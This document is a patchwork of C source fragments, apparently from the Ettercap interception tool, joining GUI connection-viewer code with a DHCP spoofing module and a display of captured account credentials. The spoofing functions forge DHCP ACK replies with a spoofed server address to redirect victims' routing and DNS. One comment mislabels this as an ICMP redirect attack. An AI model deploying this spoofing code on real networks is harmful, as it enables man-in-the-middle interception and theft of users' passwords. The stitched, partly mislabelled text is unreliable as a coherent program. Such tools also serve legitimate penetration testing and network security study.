gtk_container_remove(GTK_CONTAINER (data_window), child);
textview1 = NULL;
textview2 = NULL;
splitbuf1 = NULL;
splitbuf2 = NULL;
endmark1 = NULL;
endmark2 = NULL;
} else {
data_window = gtkui_page_new("Connection data", >kui_destroy_conndata, >kui_connection_data_detach);
}
/* don't timeout this connection */
curr_conn->flags |= CONN_VIEWING;
vbox = gtk_vbox_new(FALSE, 0);
gtk_container_add(GTK_CONTAINER(data_window), vbox);
gtk_widget_show(vbox);
/* title */
snprintf(title, TITLE_LEN, "%s:%d - %s:%d",
ip_addr_ntoa(&curr_conn->L3_addr1, src), ntohs(curr_conn->L4_addr1),
ip_addr_ntoa(&curr_conn->L3_addr2, dst), ntohs(curr_conn->L4_addr2));
label = gtk_label_new(title);
gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5);
gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0);
gtk_widget_show(label);
/* data */
scrolled = gtk_scrolled_window_new(NULL, NULL);
gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled),
GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC);
gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN);
gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0);
gtk_widget_show(scrolled);
textview3 = gtk_text_view_new();
gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview3), GTK_WRAP_CHAR);
gtk_text_view_set_editable(GTK_TEXT_VIEW (textview3), FALSE);
gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview3), FALSE);
gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview3), 5);
gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview3), 5);
gtk_container_add(GTK_CONTAINER (scrolled), textview3);
gtk_widget_show(textview3);
joinedbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview3));
gtk_text_buffer_create_tag (joinedbuf, "blue_fg", "foreground", "blue", NULL);
gtk_text_buffer_create_tag (joinedbuf, "monospace", "family", "monospace", NULL);
gtk_text_buffer_get_end_iter(joinedbuf, &iter);
endmark3 = gtk_text_buffer_create_mark(joinedbuf, "end", &iter, FALSE);
hbox = gtk_hbox_new(TRUE, 5);
gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0);
gtk_widget_show(hbox);
button = gtk_button_new_with_mnemonic("_Split View");
g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_data_split), NULL);
gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0);
gtk_widget_show(button);
button = gtk_button_new_with_mnemonic("_Kill Connection");
g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill_curr_conn), NULL);
gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0);
gtk_widget_show(button);
gtk_widget_show(data_window);
if(GTK_IS_WINDOW (data_window))
gtk_window_present(GTK_WINDOW (data_window));
else
gtkui_page_present(data_window);
/* after widgets are drawn, scroll to bottom */
g_timeout_add(500, gtkui_connections_scroll, (gpointer)2);
/* print the old data */
connbuf_print(&curr_conn->data, join_print);
/* add the hook on the connection to receive data only from it */
conntrack_hook_conn_add(curr_conn, join_print_po);
}
/*
* parses the request and send the spoofed reply
*/
static void dhcp_spoofing_req(struct packet_object *po)
{
char dhcp_hdr[LIBNET_DHCPV4_H];
struct libnet_dhcpv4_hdr *dhcp;
u_int8 *options, *opt, *end;
struct ip_addr client, server;
char tmp[MAX_ASCII_ADDR_LEN];
DEBUG_MSG("dhcp_spoofing_req");
/* get a local copy of the dhcp header */
memcpy(dhcp_hdr, po->DATA.data, LIBNET_DHCPV4_H);
dhcp = (struct libnet_dhcpv4_hdr *)dhcp_hdr;
/* get the pointers to options */
options = po->DATA.data + LIBNET_DHCPV4_H;
end = po->DATA.data + po->DATA.len;
/* use the same dhcp header, but change the type of the message */
dhcp->dhcp_opcode = LIBNET_DHCP_REPLY;
/*
* if the client is requesting a particular IP address,
* release it. so we don't mess the network too much...
* only change the router ip ;)
*/
/* get the requested ip */
if ((opt = get_dhcp_option(DHCP_OPT_RQ_ADDR, options, end)) != NULL)
ip_addr_init(&client, AF_INET, opt + 1);
else {
/* search if the client already has the ip address */
if (dhcp->dhcp_cip != 0) {
ip_addr_init(&client, AF_INET, (u_char *)&dhcp->dhcp_cip);
} else
return;
}
/* set the requested ip */
dhcp->dhcp_yip = ip_addr_to_int32(&client.addr);
/* this is a dhcp ACK */
dhcp_options[2] = DHCP_ACK;
/*
* if it is a request after an offer from a server,
* spoof its ip to be stealth.
*/
if ((opt = get_dhcp_option(DHCP_OPT_SRV_ADDR, options, end)) != NULL) {
/* get the server id */
ip_addr_init(&server, AF_INET, opt + 1);
/* set it in the header */
dhcp->dhcp_sip = ip_addr_to_int32(&server.addr);
/* set it in the options */
ip_addr_cpy((u_char*)dhcp_options + 5, &server);
send_dhcp_reply(&server, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen);
} else {
/*
* the request does not contain an identifier,
* use our ip address
*/
dhcp->dhcp_sip = ip_addr_to_int32(&GBL_IFACE->ip.addr);
/* set it in the options */
ip_addr_cpy((u_char*)dhcp_options + 5, &GBL_IFACE->ip);
send_dhcp_reply(&GBL_IFACE->ip, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen);
}
USER_MSG("DHCP spoofing: fake ACK [%s] ", mac_addr_ntoa(po->L2.src, tmp));
USER_MSG("assigned to %s \n", ip_addr_ntoa(&client, tmp));
}
/*
* details for a connection
*/
static void curses_connection_detail(void *conn)
{
struct conn_tail *c = (struct conn_tail *)conn;
char tmp[MAX_ASCII_ADDR_LEN];
char *proto = "";
char name[MAX_HOSTNAME_LEN];
unsigned int row = 0;
DEBUG_MSG("curses_connection_detail");
/* if the object already exist, set the focus to it */
if (wdg_conn_detail) {
wdg_destroy_object(&wdg_conn_detail);
wdg_conn_detail = NULL;
}
wdg_create_object(&wdg_conn_detail, WDG_WINDOW, WDG_OBJ_WANT_FOCUS);
wdg_set_title(wdg_conn_detail, "Connection detail:", WDG_ALIGN_LEFT);
wdg_set_size(wdg_conn_detail, 1, 2, 75, 23);
wdg_set_color(wdg_conn_detail, WDG_COLOR_SCREEN, EC_COLOR);
wdg_set_color(wdg_conn_detail, WDG_COLOR_WINDOW, EC_COLOR);
wdg_set_color(wdg_conn_detail, WDG_COLOR_BORDER, EC_COLOR_BORDER);
wdg_set_color(wdg_conn_detail, WDG_COLOR_FOCUS, EC_COLOR_FOCUS);
wdg_set_color(wdg_conn_detail, WDG_COLOR_TITLE, EC_COLOR_TITLE);
wdg_draw_object(wdg_conn_detail);
wdg_set_focus(wdg_conn_detail);
/* add the destroy callback */
wdg_add_destroy_key(wdg_conn_detail, CTRL('Q'), NULL);
/* print the information */
wdg_window_print(wdg_conn_detail, 1, ++row, "Source MAC address : %s",
mac_addr_ntoa(c->co->L2_addr1, tmp));
wdg_window_print(wdg_conn_detail, 1, ++row, "Destination MAC address : %s",
mac_addr_ntoa(c->co->L2_addr2, tmp));
++row;
wdg_window_print(wdg_conn_detail, 1, ++row, "Source IP address : %s",
ip_addr_ntoa(&(c->co->L3_addr1), tmp));
if (host_iptoa(&(c->co->L3_addr1), name) == E_SUCCESS)
wdg_window_print(wdg_conn_detail, 1, ++row, "Source hostname : %s",
name);
#ifdef HAVE_GEOIP
if (GBL_CONF->geoip_support_enable)
wdg_window_print(wdg_conn_detail, 1, ++row, "Source location : %s",
geoip_country_by_ip(&c->co->L3_addr1));
#endif
wdg_window_print(wdg_conn_detail, 1, ++row, "Destination IP address : %s",
ip_addr_ntoa(&(c->co->L3_addr2), tmp));
if (host_iptoa(&(c->co->L3_addr2), name) == E_SUCCESS)
wdg_window_print(wdg_conn_detail, 1, ++row, "Destination hostname : %s", name);
#ifdef HAVE_GEOIP
if (GBL_CONF->geoip_support_enable)
wdg_window_print(wdg_conn_detail, 1, ++row, "Destination location : %s",
geoip_country_by_ip(&c->co->L3_addr2));
#endif
++row;
switch (c->co->L4_proto) {
case NL_TYPE_UDP:
proto = "UDP";
break;
case NL_TYPE_TCP:
proto = "TCP";
break;
}
wdg_window_print(wdg_conn_detail, 1, ++row, "Protocol : %s", proto);
wdg_window_print(wdg_conn_detail, 1, ++row, "Source port : %-5d %s",
ntohs(c->co->L4_addr1), service_search(c->co->L4_addr1, c->co->L4_proto));
wdg_window_print(wdg_conn_detail, 1, ++row, "Destination port : %-5d %s",
ntohs(c->co->L4_addr2), service_search(c->co->L4_addr2, c->co->L4_proto));
row++;
wdg_window_print(wdg_conn_detail, 1, ++row, "--> %d <-- %d total: %d ", c->co->tx, c->co->rx, c->co->xferred);
row++;
if (c->co->DISSECTOR.user) {
wdg_window_print(wdg_conn_detail, 1, ++row, "Account : %s / %s", c->co->DISSECTOR.user, c->co->DISSECTOR.pass);
if (c->co->DISSECTOR.info)
wdg_window_print(wdg_conn_detail, 1, ++row, "Additional Info : %s", c->co->DISSECTOR.info);
}
}
/*
* init the ICMP REDIRECT attack
*/
static int dhcp_spoofing_start(char *args)
{
struct in_addr ipaddr;
char *p;
int i = 1;
DEBUG_MSG("dhcp_spoofing_start");
if (!strcmp(args, ""))
SEMIFATAL_ERROR("DHCP spoofing needs a parameter.\n");
/*
* Check to see if sniff has started
*/
if (!GBL_SNIFF->active)
SEMIFATAL_ERROR("DHCP spoofing requires sniffing to be active.\n");
/* check the parameter:
*
* ip_pool/netmask/dns
*/
for (p = strsep(&args, "/"); p != NULL; p = strsep(&args, "/")) {
/* first parameter (the ip_pool) */
if (i == 1) {
char tmp[strlen(p)+4];
/* add the / to be able to use the target parsing function */
snprintf(tmp, strlen(p)+4, "/%s//", p);
if (compile_target(tmp, &dhcp_ip_pool) != ESUCCESS)
break;
/* second parameter (the netmask) */
} else if (i == 2) {
/* convert from string */
if (inet_aton(p, &ipaddr) == 0)
break;
/* get the netmask */
ip_addr_init(&dhcp_netmask, AF_INET, (u_char *)&ipaddr);
/* third parameter (the dns server) */
} else if (i == 3) {
char tmp[MAX_ASCII_ADDR_LEN];
/* convert from string */
if (inet_aton(p, &ipaddr) == 0)
break;
/* get the netmask */
ip_addr_init(&dhcp_dns, AF_INET, (u_char *)&ipaddr);
/* all the parameters were parsed correctly... */
USER_MSG("DHCP spoofing: using specified ip_pool, netmask %s", ip_addr_ntoa(&dhcp_netmask, tmp));
USER_MSG(", dns %s\n", ip_addr_ntoa(&dhcp_dns, tmp));
/* add the hookpoints */
hook_add(HOOK_PROTO_DHCP_REQUEST, dhcp_spoofing_req);
hook_add(HOOK_PROTO_DHCP_DISCOVER, dhcp_spoofing_disc);
/* create the options */
dhcp_setup_options();
/* se the pointer to the first ip pool address */
dhcp_free_ip = LIST_FIRST(&dhcp_ip_pool.ips);
return ESUCCESS;
}
i++;
}
/* error parsing the parameter */
SEMIFATAL_ERROR("DHCP spoofing: parameter number %d is incorrect.\n", i);
return -EFATAL;
}